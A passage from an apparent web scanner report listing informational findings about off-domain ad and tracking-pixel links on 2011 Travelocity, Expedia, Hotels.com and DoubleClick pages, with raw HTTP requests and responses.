User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/roam','waitscreen','menubar,toolbar,location,status,scrollbars,resizable,width=400,height=400,left=100,top=300'); return false;"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110802_roaminggnome_300x250.jpg" galleryimg="no" border="0"></a>
...[SNIP]...
19.123. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/roam','waitscreen','menubar,toolbar,location,status,scrollbars,resizable,width=400,height=400,left=100,top=300'); return false;"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110802_roaminggnome_300x250.jpg" galleryimg="no" border="0"></a>
...[SNIP]...
19.124. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...
68-1317600484&Redirect=http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|4676|hotels_main,00.html?WA1=03031&WA2=ent&WA3=342&WA4=0930_homepage_uscities_342x296jpg&WA5=IM&WA7=16427" target="_top"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/0930_homepage_uscities_342x296.jpg" alt="U.S. Hotels" width="342" height="296" border="0">
<img src="http://travel.travelocity.com/___waseq.img?WA1=03031&WA2=ent&WA3=342&WA4=0930_homepage_uscities_342x296jpg&WA5=IM&WA7=16427" width="1" height="1" border="0">
...[SNIP]...
19.125. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/HSDirect.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Hotels/Delivery/HSDirect.aspx?thrn=1299437744&D=BOS&CI=20111004&CO=20111007&Eapid=0000&SID=1&RID=178239&pr=1&pa=1&Cr=&H=4215|15861|23415|1680030|2800816|4443|1450057|12244|17845|16067|15159|10391|560932|22961|20351|16680|903185|151201|16079|293|119162|980972|26283|2311712|22512&LAP=429.0|339.15|289.0|432.33|308.54|383.1|359.1|349.0|401.33|412.33|409.4|259.0|221.1|345.67|72.1|349.0|414.0|379.95|359.0|127.99|436.33|419.0|335.67|445.67|399.0&LTP=1287.00|1017.45|867.00|1297.00|925.60|1149.30|1077.30|1047.00|1204.00|1237.00|1228.21|777.00|663.30|1037.00|216.30|1047.00|1242.00|1139.85|1077.00|383.97|1309.00|1257.00|1007.00|1337.00|1197.00&HAP=449.00|509.15|289.00|432.33|388.54|401.10|407.33|399.00|437.33|462.33|429.91|259.00|221.10|345.67|72.10|349.00|614.00|429.95|389.00|159.99|436.33|419.00|335.67|525.67|459.00&HTP=1347.00|1527.45|867.00|1297.00|1165.60|1203.30|1222.00|1197.00|1312.00|1387.00|1289.74|777.00|663.30|1037.00|216.30|1047.00|1842.00|1289.85|1167.00|479.97|1309.00|1257.00|1007.00|1577.00|1377.00&Str=0&Si=0&vers=en&tid=1 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:10:59 GMT; path=/
Set-Cookie: expEAPID=0000; expires=Tue, 04-Oct-2011 00:10:59 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQH2seBJxXACZ7631o5Ado1kVl48f7csfT3c6loQl0QaGr+exqsZE8q6RN0qJ9Kmc82VZVBumioxbKldNopV86WTUYH0n5v3Toyx0+FBPR+W9VyVapTaQWQlqvxPP7vS71A=; expires=Thu, 02-Oct-2014 00:10:59 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close

var gem3442live=document.getElementById("th_fee");var th_StaticStart=new Date();var th_StaticEnd=new Date();var th_ScrapeStart=new Date();var th_ScrapeEnd=new Date();var th_ScriptCounter=1;var th_QS=d
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"8373":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.2;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"5306":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.3;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"22600":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.4;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;case"20303":thpx='<IMG SRC="http://ad.doubleclick.net/ad/N6090.218.9105273493621/B5196081.5;sz=1x1;ord='+thrand+'?" BORDER=0 WIDTH=1 HEIGHT=1 ALT="Advertisement">';break;default:thpx=""}return thpx}catch(er){return""}}function thNectar(hotels,s1,s2){var headline=s1;var details=s2;function insert(elParent,headline,details){var elNew=document.createElement("div")
...[SNIP]...
19.126. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=1686084058;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=6000101;u4=20111009%7C20111016;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=16067%7C15159%7C2558%7C10391%7C903185;u14=441.86%7C416.89%7C456.43%7C118.15%7C444.0;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:38:37 GMT
Expires: Mon, 03 Oct 2011 00:38:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 751
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"
src="http://tags.bluekai.com/site/2625?ret=html&phint=u1=Hotel&phint=u2=6000101&phint=u3=&phint=u4=20111009%7C20111016&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=16067%7C15159%7C2558%7C10391%7C903185&phint=u14=441.86%7C416.89%7C456.43%7C118.15%7C444.0&phint=u16=USD&phint=u20="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
19.127. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111004%7C20111007;u2=178239;u6=1;u7=1%7C0;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u11=35;u13=4215;u14=429;u16=USD;ord=7232943603303.283? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:14:11 GMT
Expires: Mon, 03 Oct 2011 00:14:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 661
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111004%7C20111007&phint=u6=1&phint=u7=1%7C0&phint=u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers&phint=u11=35&phint=u13=4215&phint=u14=429&phint=u15="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
19.128. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:09:20 GMT
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 3041
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" /><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://px.admonkey.dapper.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src='http://a.tribalfusion.com/i.cid?c=362743&d=30&page=landingPage' width='1' height='1' border='0'>//Search/Listing
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032220788/?label=ZkuQCOTitgEQ9OCZ7AM&amp;guid=ON&amp;script=0"/><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72833&pixelID=72834&pixelID=72835&pixelID=72836&pixelID=72837&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...
19.129. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=11678075? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 01:02:16 GMT
Expires: Mon, 03 Oct 2011 01:02:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 3041
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" /><!-- Dapper Data Pixel -->
<img width="1" height="1" border="0" alt="" src="http://px.admonkey.dapper.net/PixelMonkey?adId=hotelsus&format=image&useReferrer=1"/>
<!-- End of Dapper Data Pixel --><img src='http://a.tribalfusion.com/i.cid?c=362743&d=30&page=landingPage' width='1' height='1' border='0'>//Search/Listing
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1401516" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032220788/?label=ZkuQCOTitgEQ9OCZ7AM&amp;guid=ON&amp;script=0"/><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72833&pixelID=72834&pixelID=72835&pixelID=72836&pixelID=72837&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...
19.130. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston%20Omni%20Parker%20House%20Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=71228260? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:28:21 GMT
Expires: Mon, 03 Oct 2011 00:28:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2049
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"> <img src="http://leadback.advertising.com/adcedge/lb?site=695501&betr=lbhotels2_cs=[+]1[720]" width="1" height="1" border="0"><img src="http://ad.yieldmanager.com/pixel?id=630726&t=2" width="1" height="1" />//Hotel Property
<script type="text/javascript">
...[SNIP]...
</script><iframe src="http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1401516" width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=72838&pixelID=72839&pixelID=72840&pixelID=72841&pixelID=72842&partnerID=97&clientID=5777&key=segment" width="1" height="1" /></body>
...[SNIP]...
19.131. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=2588783;type=nausc547;cat=nausi164;u=CCF4A420AF8B480F8413EFB42E880287;u16=USD;u13=4215;u14=429;u11=35;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u7=1%7C0;u6=1;u4=20111004%7C20111007;u1=Hotel;u2=178239;ord=691577950492.5012? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:14:14 GMT
Expires: Mon, 03 Oct 2011 00:14:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2292
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><iframe width="1" height="1" frameborder="0" scrolling="no" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=expedia&format=html&useReferrer=1&force_segment=Infosite_US"></iframe>
...[SNIP]...
19.132. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

